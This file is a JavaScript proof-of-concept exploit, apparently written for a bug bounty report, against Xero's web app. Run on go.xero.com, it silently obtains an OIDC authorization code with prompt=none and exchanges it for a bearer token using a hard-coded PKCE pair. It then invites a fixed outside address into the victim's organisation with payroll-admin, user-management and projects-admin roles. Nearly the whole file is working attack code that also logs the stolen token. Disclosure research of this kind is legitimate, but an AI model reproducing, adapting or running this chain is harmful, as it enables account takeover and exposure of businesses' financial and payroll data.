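// Proof-of-concept: silent OIDC re-authentication followed by a privileged
// user invite, driven entirely from a script running on https://go.xero.com.
//
// What the script does, in order:
//   1. Opens a popup to Xero's authorize endpoint with `prompt=none`, so the
//      identity provider is asked to answer from the victim's existing login
//      session without showing any UI, and `response_mode=fragment`, so the
//      result lands in the URL fragment of https://go.xero.com/oidc/silent.html.
//   2. Polls the popup until it is back on this page's origin. That comparison
//      can only succeed if the script itself runs on https://go.xero.com; how
//      it got there (injection, devtools console, ...) is not shown here.
//   3. Reads `code` from the fragment and exchanges it at identity.xero.com
//      with the code_verifier that pairs with the hard-coded code_challenge.
//      PKCE gives no protection in this setting: the same script performs both
//      the authorization request and the token exchange, so it simply ships a
//      matching challenge/verifier pair.
//   4. Uses the resulting bearer token to invite a fixed address into the
//      organisation with advisor / payroll-admin / projects-admin roles.
//
// The organisation id is scraped from the `#header-data` element of the page
// the script runs on. This is PoC code with a fixed recipient address; nothing
// is parameterised for wider use.
//
// Changes from the first version: errors other than the expected cross-origin
// SecurityError no longer restart the whole branch once a second (a failed
// `#header-data` parse used to retry forever), an authorization error in the
// fragment is reported instead of being sent to the token endpoint as
// `code=null`, and the request plumbing is split into small helpers.

const CLIENT_ID = 'xero_business_go';
const REDIRECT_URI = 'https://go.xero.com/oidc/silent.html';
const TOKEN_URL = 'https://identity.xero.com/connect/token';
// Fixed PKCE pair. The exchange in step 3 only works if CODE_VERIFIER is the
// S256 preimage of CODE_CHALLENGE; the pair below is the one the PoC was
// written with — TODO confirm before reusing elsewhere.
const CODE_CHALLENGE = 'SMdhjMTMY46uPVb59lq8ezrfrgzQIuTW-1n5W-pPfNA';
const CODE_VERIFIER = '_PAd7JdtOsjE5zvvVkEHwOOyMBRoE9vYZaFNLFVdkAXn3XzKnnJYw74ohMFGM3fSXf1U2NA8O6pYgpwvsXodLg';
const SCOPE = 'openid profile email xero_frontend-apis xero_frontend-platform-apis';

// encodeURIComponent reproduces the original percent-encoding byte for byte
// (spaces become %20, not +), so the authorize request is unchanged.
const AUTHORIZE_URL = `https://login.xero.com/identity/connect/authorize?client_id=${CLIENT_ID}&redirect_uri=${encodeURIComponent(REDIRECT_URI)}&response_type=code&scope=${encodeURIComponent(SCOPE)}&code_challenge=${CODE_CHALLENGE}&code_challenge_method=S256&prompt=none&response_mode=fragment`;

// Step 1: kick off the silent authorization in a popup. `window.open` returns
// null when the popup is blocked; the poller handles that by stopping.
const window2 = window.open(AUTHORIZE_URL);

/**
 * Returns the popup's origin, or null while the popup is still on a foreign
 * origin (reading `location` across origins throws a SecurityError, which is
 * the only error this helper is meant to absorb).
 */
function popupOrigin(win) {
  try {
    return win.location.origin;
  } catch (err) {
    return null;
  }
}

/**
 * Sends a POST with the given headers and body and hands the finished
 * XMLHttpRequest to `onDone`. Headers are set in insertion order.
 */
function post(url, headers, body, onDone) {
  const req = new XMLHttpRequest();
  req.open('POST', url, true);
  Object.keys(headers).forEach(function (name) {
    req.setRequestHeader(name, headers[name]);
  });
  req.onreadystatechange = function () {
    if (req.readyState === XMLHttpRequest.DONE) {
      onDone(req);
    }
  };
  req.send(body);
}

/**
 * Scrapes the organisation id from the page's `#header-data` element.
 * NOTE(review): the fixed substring(21, 125) + "}" slice depends on the exact
 * layout of that element's text; confirm against the page before reuse.
 * Throws when the element or the id is missing.
 */
function readOrganisationId() {
  const headerData = document.getElementById('header-data');
  if (!headerData) {
    throw new Error('#header-data not found on this page');
  }
  const orgId = JSON.parse(headerData.textContent.substring(21, 125) + '}').organisationId;
  if (!orgId) {
    throw new Error('organisationId not found in #header-data');
  }
  return orgId;
}

/**
 * Step 3: exchanges the authorization code for an access token using the
 * fixed code_verifier, then calls `onToken(accessToken)`. Failures are logged
 * and the chain stops.
 */
function exchangeCode(code, onToken) {
  // URLSearchParams percent-encodes the redirect URI exactly like the original
  // hand-written body and, unlike it, also encodes the code itself.
  const tokenBody = new URLSearchParams({
    client_id: CLIENT_ID,
    code: code,
    redirect_uri: REDIRECT_URI,
    code_verifier: CODE_VERIFIER,
    grant_type: 'authorization_code',
  }).toString();
  post(TOKEN_URL, { 'Content-Type': 'application/x-www-form-urlencoded' }, tokenBody, function (req) {
    if (req.status !== 200) {
      console.error('Token request failed:', req.status, req.responseText);
      return;
    }
    let accessToken;
    try {
      accessToken = JSON.parse(req.responseText).access_token;
    } catch (e) {
      console.error('Error parsing token response:', e);
      return;
    }
    // NOTE(review): this prints a live bearer token; acceptable for a PoC run,
    // not for anything that leaves the researcher's machine.
    console.log('Access Token:', accessToken);
    onToken(accessToken);
  });
}

/**
 * Step 4: invites the fixed recipient into organisation `orgId` with the
 * advisor / manage-users / payroll-admin / projects-admin role set, using the
 * freshly obtained bearer token.
 */
function inviteUser(accessToken, orgId) {
  const invite = {
    messageBody: 'Hello ATTACKER',
    user: { email: 'refaat1@bugcrowdninja.com', firstName: 'user', lastName: 'X' },
    accounting: { hasBankAccountAdmin: true, hasManageUsers: true, isEnabled: true, role: 'ACCOUNTING_ROLE_ADVISOR' },
    expenses: { isEnabled: false },
    payroll: { isAdmin: true, isEmployee: false },
    projects: { isEnabled: true, role: 'PROJECTS_ADMIN' },
  };
  const url = `https://go.xero.com/api/user-settings/organisations/${encodeURIComponent(orgId)}/users`;
  const headers = {
    Authorization: `Bearer ${accessToken}`,
    'Content-Type': 'application/json',
  };
  post(url, headers, JSON.stringify(invite), function (req) {
    if (req.status === 200 || req.status === 201) {
      console.log('API Response:', req.responseText);
    } else {
      console.error('API Request Failed:', req.status, req.responseText);
    }
  });
}

/**
 * Handles the popup's return: pulls `code` out of the fragment and starts the
 * token exchange. With `prompt=none` the provider answers with an `error`
 * parameter (e.g. login_required) instead of a code when there is no usable
 * session; that case is reported rather than sent on as `code=null`.
 */
function handleRedirect(fragment) {
  const params = new URLSearchParams(fragment);
  const code = params.get('code');
  if (code === null) {
    const reason = params.get('error') || 'no error parameter either';
    throw new Error(`no authorization code in fragment: ${reason}`);
  }
  const orgId = readOrganisationId();
  exchangeCode(code, function (accessToken) {
    inviteUser(accessToken, orgId);
  });
}

/**
 * Step 2: polled once a second. Stops when the popup is gone, keeps waiting
 * while it is on a foreign origin, and runs the redirect handling exactly once
 * when it is back on our origin — any error at that point ends the poll
 * instead of being retried.
 */
function checkForRedirectBack() {
  if (!window2 || window2.closed) {
    clearInterval(pollTimer);
    return;
  }
  if (popupOrigin(window2) !== window.location.origin) {
    return; // still on login.xero.com (or mid-redirect); keep polling
  }
  clearInterval(pollTimer);
  console.log('Returned to our site:', window2.location.href);
  // Read the fragment before closing the popup; response_mode=fragment puts
  // the code there, not in the query string.
  const fragment = window2.location.hash.substring(1);
  window2.close();
  try {
    handleRedirect(fragment);
  } catch (err) {
    console.error('Aborting after redirect:', err);
  }
}

const pollTimer = setInterval(checkForRedirectBack, 1000);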